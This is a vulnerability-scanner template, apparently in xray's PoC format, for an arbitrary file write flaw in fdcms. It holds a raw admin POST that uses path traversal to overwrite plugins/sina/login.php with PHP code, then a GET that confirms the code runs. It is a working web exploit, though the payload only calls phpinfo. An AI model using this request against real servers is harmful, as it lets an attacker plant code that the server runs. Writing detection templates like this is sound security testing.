id: fdcms-anyfilewrite

info:
  name: fdcms 任意文件写入
  author: qwtd
  severity: critical
  verified: true
  description: |
    fdcms存在任意文件写入漏洞

set:
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /admin.php?m=ftpl&a=edit&dosubmit=1 HTTP/1.1
        Host: {{hostname}}
        Content-Length: 204
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
        Connection: close

        info[filename]=../../../plugins/sina/login.php&info[note]=&info[content]=<?php phpinfo()?>&info[path]=C%3A%5CSource%5Cfangfacms%5Cpublic%5Ctheme%5Cdefault&__hash__=f1af1bf3d35d3eed755d72256859b866
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /plugins/sina/login.php
    expression: response.status == 200 && response.body.bcontains(b'System') && response.body.bcontains(b'phpinfo')
expression: r0() && r1()